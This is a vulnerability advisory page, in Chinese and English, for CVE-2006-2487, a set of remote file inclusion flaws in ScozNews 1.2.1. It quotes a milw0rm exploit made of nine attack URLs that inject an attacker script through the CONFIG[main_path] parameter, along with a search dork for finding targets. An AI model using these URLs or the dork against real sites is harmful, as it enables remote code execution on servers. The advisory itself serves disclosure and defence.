CVE-2006-2487
CVSS7.5
发布时间 :2006-05-19 19:02:00
修订时间 :2011-03-07 21:36:17
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in ScozNews 1.2.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFIG[main_path] parameter in (1) functions.php, (2) template.php, (3) news.php, (4) help.php, (5) mail.php, (6) Admin/admin_cats.php, (8) Admin/admin_edit.php, (9) Admin/admin_import.php, and (10) Admin/admin_templates.php. NOTE: this might be resultant from a variable overwrite issue.


[CNNVD]ScozNet ScozNews 多个远程文件包含漏洞(CNNVD-200605-378)

        ScozNews是一款新闻管理系统。
        ScozNews处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        ScozNews的多个脚本没有正确验证"CONFIG[main_path]"参数的输入,允许攻击者通过包含本地或外部资源的文件执行任意PHP代码。
        受影响的脚本包括:
        sources/functions.php
        sources/help.php
        sources/mail.php
        sources/news.php
        sources/template.php
        sources/Admin/admin_cats.php
        sources/Admin/admin_edit.php
        sources/Admin/admin_import.php
        sources/Admin/admin_templates.php
        成功攻击要求启用了register_globals。
        
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2487
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2487
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-378
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1847
(UNKNOWN)  VUPEN  ADV-2006-1847
http://www.securityfocus.com/bid/18027
(UNKNOWN)  BID  18027
http://secunia.com/advisories/20156
(VENDOR_ADVISORY)  SECUNIA  20156
http://milw0rm.com/exploits/1800
(UNKNOWN)  MILW0RM  1800
http://xforce.iss.net/xforce/xfdb/27717
(UNKNOWN)  XF  scoznews-functions-file-include(27717)
http://xforce.iss.net/xforce/xfdb/26520
(UNKNOWN)  XF  scoznews-mainpath-file-include(26520)
http://www.securityfocus.com/archive/1/archive/1/439969/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060713 ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability
http://www.osvdb.org/25616
(UNKNOWN)  OSVDB  25616
http://securitytracker.com/id?1016491
(UNKNOWN)  SECTRACK  1016491

- 漏洞信息

ScozNet ScozNews 多个远程文件包含漏洞
高危 输入验证
2006-05-19 00:00:00 2006-05-22 00:00:00
远程  
        ScozNews是一款新闻管理系统。
        ScozNews处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        ScozNews的多个脚本没有正确验证"CONFIG[main_path]"参数的输入,允许攻击者通过包含本地或外部资源的文件执行任意PHP代码。
        受影响的脚本包括:
        sources/functions.php
        sources/help.php
        sources/mail.php
        sources/news.php
        sources/template.php
        sources/Admin/admin_cats.php
        sources/Admin/admin_edit.php
        sources/Admin/admin_import.php
        sources/Admin/admin_templates.php
        成功攻击要求启用了register_globals。
        
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.scoznet.com/

- 漏洞信息 (1800)

ScozNews <= 1.2.1 (mainpath) Remote File Inclusion Vulnerability (EDBID:1800)
php webapps
2006-05-17 Verified
0 Kacper
N/A [点击下载]
################ DEVIL TEAM THE BEST POLISH TEAM #################
#ScozNews v1.2.1 - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#dork: "(Powered By ScozNews)"
##################################################################

http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]


http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]


http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]

###################################################################
#Elo ;-)

# milw0rm.com [2006-05-17]
		

- 漏洞信息

25616
ScozNews Multiple Script CONFIG[main_path] Variable Overwrite Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

ScozNews contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to multiple scripts not properly sanitizing user input supplied to the 'CONFIG[main_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-17 Unknow
2006-05-17 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站